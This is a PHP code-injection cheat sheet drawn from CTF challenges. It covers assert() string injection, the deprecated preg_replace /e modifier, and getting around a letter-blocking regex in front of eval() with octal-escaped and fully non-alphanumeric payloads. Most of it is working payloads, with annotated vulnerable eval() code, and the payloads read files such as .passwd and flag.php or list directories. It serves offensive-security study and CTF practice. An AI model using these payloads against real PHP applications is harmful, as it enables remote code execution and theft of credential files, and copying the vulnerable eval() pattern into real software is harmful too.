PHP Functions

Assert()

# assert() evaluates a string argument as PHP code — but only on PHP 5.x/7.x with assertions enabled (zend.assertions / assert.active); string evaluation was deprecated in 7.2 and removed in 8.0, where a string argument is merely tested for truthiness
# Example from a CTF challenge: probing the page parameter with '..' makes the failed assertion print the full expression, revealing how the input is spliced into it
?page=..
Warning : assert() : Assertion "strpos('includes/...php', '..') === false" failed in path/index.php on line 8

# The request looks like this
assert("strpos('includes/' . $_GET['page'] . '.php', '..') === false")

# If we inject this (URL-encode the quotes, spaces and pipes in a real request)
?page=salade.php','..') || print('tomate') || strpos('oignons

# The request will look like
assert("strpos('includes/salade.php','..') || print('tomate') || strpos('oignons.php','..') === false")

# Then, to exploit: replace print('tomate') with the call you actually want evaluated, e.g. reading a file
?page=salade.php','..') || show_source('.passwd') || strpos('oignons

PHP preg_replace()

# In PHP, a PCRE pattern must be wrapped in delimiters; without them preg_match() emits a warning and returns false
preg_match("recherche","contenu"); # wrong: no delimiter -> warning, returns false (not 0)
preg_match("/recherche/","contenu"); # OK: "/" delimits the pattern

# The /e modifier (PREG_REPLACE_EVAL) makes preg_replace() evaluate the replacement string as PHP code after back-reference substitution; it was deprecated in PHP 5.5 and removed in 7.0 (the call then warns and returns null), so this only works on PHP 5.x — preg_replace_callback() is the non-eval replacement
# Argument order: pattern, replacement, subject. When the pattern ends in the
# /e modifier, the replacement string is evaluated as PHP code (PHP 5.x only;
# removed in 7.0, where the call warns and returns null).
preg_replace("input1search","input2replace","input3content");
# /e on "a" matches in "abcd", so the replacement is eval'd: prints 123
preg_replace("/a/e","print(123)","abcd");
# Directory listing of the current working directory via the eval'd replacement
preg_replace("/a/e","print_r(scandir('.'))","abcd");
# Reads flag.php; the content becomes the replacement text (only visible if the
# result is echoed by the application)
preg_replace("/a/e","file_get_contents('flag.php')","abcd");

PHP preg_match()

# A blocklist regex in front of eval() — here preg_match('/[a-zA-Z`]/', ...) — can be bypassed with a payload that contains no letters at all
# If the application then eval()s the input, the payload still executes: string escapes are decoded when the eval'd code is compiled, i.e. after the filter has already run on the raw text

# Application code
# Vulnerable pattern: a character blocklist in front of eval().
# The regex rejects ASCII letters and the backtick only, so digits, quotes,
# backslashes, parentheses, `$` and `_` all pass. A double-quoted literal
# built from octal/hex escapes ("\146\151\154\145...") is decoded when the
# eval'd string is compiled, which happens after this check ran on the raw
# input.
# NOTE(review): `!preg_match(...)` also treats the `false` error return
# (PCRE failure, e.g. a bad pattern) exactly like "no match" (0), so a
# preg_match() error opens the eval path too; a strict `=== 0` comparison
# avoids that, but the real fix is to never eval() user-controlled text.
if(!preg_match('/[a-zA-Z`]/', $_POST['input'])){
        print '<fieldset><legend>Result</legend>';
        # User input is concatenated straight into executable code.
        eval('print '.$_POST['input'].";");
        print '</fieldset>';
    }
    

# Exploitation and Bypass
# Write the function name and its argument as octal escapes inside double-quoted strings: the second line below is the encoded form of the first ("\146\151\154\145..." decodes to file_get_contents, "\056\160..." to .passwd). Calling a string literal as "..."() requires PHP 7.0+
 file_get_contents(".passwd")
 "\146\151\154\145\137\147\145\164\137\143\157\156\164\145\156\164\163"("\056\160\141\163\163\167\144")

# You can also generate a payload made only of non-alphanumeric characters with Und3rCov3r (https://github.com/v1ll41n/Und3rCov3r)
echo -n "phpinfo();" > tmp.php
php Und3rCov3r.php 1 tmp.php

# It will create an alphax.php file containing the encoded payload. NOTE: the generated code relies on undefined constants (the bare `_` in `$_._` and `+_`) being silently coerced to strings; PHP 8 turns an undefined constant into a fatal Error, so expect this to work on PHP 5.x/7.x only
$_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$______________=+_;$______++;$_______++;$_______++;$________++;$________++;$________++;$_________++;$_________++;$_________++;$_________++;$__________++;$__________++;$__________++;$__________++;$__________++;$___________++;$___________++;$___________++;$___________++;$___________++;$___________++;$____________++;$____________++;$____________++;$____________++;$____________++;$____________++;$____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;
$__('$_="'.$___.$______.$___________.$______________.$___.$______.$__________.$______________.$___.$______.$___________.$______________.$___.$______.$__________.$______.$___.$______.$__________.$___________.$___.$______.$_________.$___________.$___.$______.$__________.$____________.$___.$__________.$______________.$___.$__________.$______.$___.$____________.$________.'"');$__($_);

# You can then, for example, read a file — the next line is the clear-text payload, followed by its encoded form
 readfile(".passwd");
$_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$______________=+_;$______++;$_______++;$_______++;$________++;$________++;$________++;$_________++;$_________++;$_________++;$_________++;$__________++;$__________++;$__________++;$__________++;$__________++;$___________++;$___________++;$___________++;$___________++;$___________++;$___________++;$____________++;$____________++;$____________++;$____________++;$____________++;$____________++;$____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;
$__('$_="'.$___.$______.$___________.$_______.$___.$______.$_________.$__________.$___.$______.$_________.$______.$___.$______.$_________.$_________.$___.$______.$_________.$___________.$___.$______.$__________.$______.$___.$______.$__________.$_________.$___.$______.$_________.$__________.$___.$__________.$______________.$___.$_________.$_______.$___.$__________.$___________.$___.$______.$___________.$______________.$___.$______.$_________.$______.$___.$______.$___________.$________.$___.$______.$___________.$________.$___.$______.$___________.$____________.$___.$______.$_________.$_________.$___.$_________.$_______.$___.$__________.$______.$___.$____________.$________.'"');$__($_);